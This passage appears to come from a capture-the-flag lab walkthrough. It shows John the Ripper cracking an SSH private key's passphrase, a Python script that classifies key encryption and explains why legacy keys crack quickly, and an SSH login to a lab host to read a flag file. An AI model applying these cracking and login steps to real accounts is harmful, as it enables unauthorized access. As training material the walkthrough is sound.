Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
■■■■■ (id_rsa)
1g 0:00:00:00 DONE (2023-11-23 20:40) 20.00g/s 1654Kp/s 1654Kc/s 1654KC/s ■■■■■..■■■■■
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
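The two cost lines john printed are what make this key cheap to crack. As an added example, not from the writeup or from john, the Python below reads only the header of a private key file and reports the same two facts: for a legacy PEM key (Proc-Type/DEK-Info headers) the KDF is OpenSSL's EVP_BytesToKey with MD5 and one iteration, and for a modern openssh-key-v1 file it parses the cipher name, KDF name and bcrypt round count out of the binary header. The sample keys are constructed header-only stubs with no key material in them, and evp_bytes_to_key shows what john has to compute per candidate in the legacy case.

```python
import base64
import hashlib
import struct


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int) -> bytes:
    """OpenSSL's legacy PEM KDF (EVP_BytesToKey, MD5, count=1):
    D1 = MD5(pass||salt), D2 = MD5(D1||pass||salt), ... concatenated up to key_len.
    For a legacy PEM key the salt is the first 8 bytes of the DEK-Info IV.
    One or two MD5 calls per candidate is why john runs at >1M candidates/s."""
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]


def _read_string(buf: bytes, off: int):
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def _classify_openssh_v1(blob: bytes) -> dict:
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(magic)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    kdfopts, off = _read_string(blob, off)
    rounds, salt = 0, b""
    if kdf == b"bcrypt":                       # kdfoptions = string salt, uint32 rounds
        salt, o = _read_string(kdfopts, 0)
        (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
    return {"format": "openssh-v1", "cipher": cipher.decode(), "kdf": kdf.decode(),
            "rounds": rounds, "salt": salt, "encrypted": cipher != b"none"}


def classify_private_key(pem_text: str) -> dict:
    """Report format, cipher, KDF and iteration count from a key file's header."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        return _classify_openssh_v1(base64.b64decode("".join(lines[1:-1])))
    headers = {}
    for line in lines[1:-1]:
        if ":" not in line:                    # base64 body never contains ':'
            break
        k, v = line.split(":", 1)
        headers[k.strip()] = v.strip()
    if "DEK-Info" in headers:
        cipher, iv_hex = headers["DEK-Info"].split(",")
        return {"format": "pem-legacy", "cipher": cipher, "kdf": "EVP_BytesToKey(MD5)",
                "rounds": 1, "salt": bytes.fromhex(iv_hex)[:8], "encrypted": True}
    return {"format": "pem-legacy", "cipher": "none", "kdf": "none",
            "rounds": 0, "salt": b"", "encrypted": False}


def cracking_note(info: dict) -> str:
    if not info["encrypted"]:
        return "unencrypted: usable as-is"
    if info["kdf"].startswith("EVP_BytesToKey"):
        return "legacy KDF, one MD5 round per candidate: wordlist attack is cheap"
    return f"{info['kdf']} with {info['rounds']} rounds per candidate: far slower per guess"


# --- constructed samples: header material only, no usable key inside ---
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

""" + base64.b64encode(b"\x00" * 48).decode() + """
-----END RSA PRIVATE KEY-----
"""


def make_openssh_v1(cipher: bytes, kdf: bytes, salt: bytes, rounds: int) -> str:
    """Build just the openssh-key-v1 header (constructed stub); a real file
    continues with the public key and the encrypted private section."""
    s = lambda b: struct.pack(">I", len(b)) + b
    kdfopts = s(salt) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + s(cipher) + s(kdf) + s(kdfopts) + struct.pack(">I", 1)
    body = base64.b64encode(blob).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + body + "\n-----END OPENSSH PRIVATE KEY-----\n"


OPENSSH_BCRYPT = make_openssh_v1(b"aes256-ctr", b"bcrypt", b"\x11" * 16, 16)

if __name__ == "__main__":
    for text in (LEGACY_PEM, OPENSSH_BCRYPT):
        info = classify_private_key(text)
        print(info["format"], info["cipher"], info["kdf"], info["rounds"], "->", cracking_note(info))
    legacy = classify_private_key(LEGACY_PEM)
    print("AES-128 key for passphrase 'secret':", evp_bytes_to_key(b"secret", legacy["salt"], 16).hex())
```

Pointed at a real file (`classify_private_key(open("id_rsa").read())`) this tells you before running john whether a wordlist attack is realistic; re-saving a key with `ssh-keygen -p -o -a 100` moves it to the openssh-v1/bcrypt format.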
Set the key's permissions to 600 (ssh refuses to use a private key that others can read), then log in as kay with -i and enter the cracked passphrase at the prompt.
Her home directory contains pass.bak, and its contents are the answer to this question.
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa kay@10.10.96.211
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
■■■■■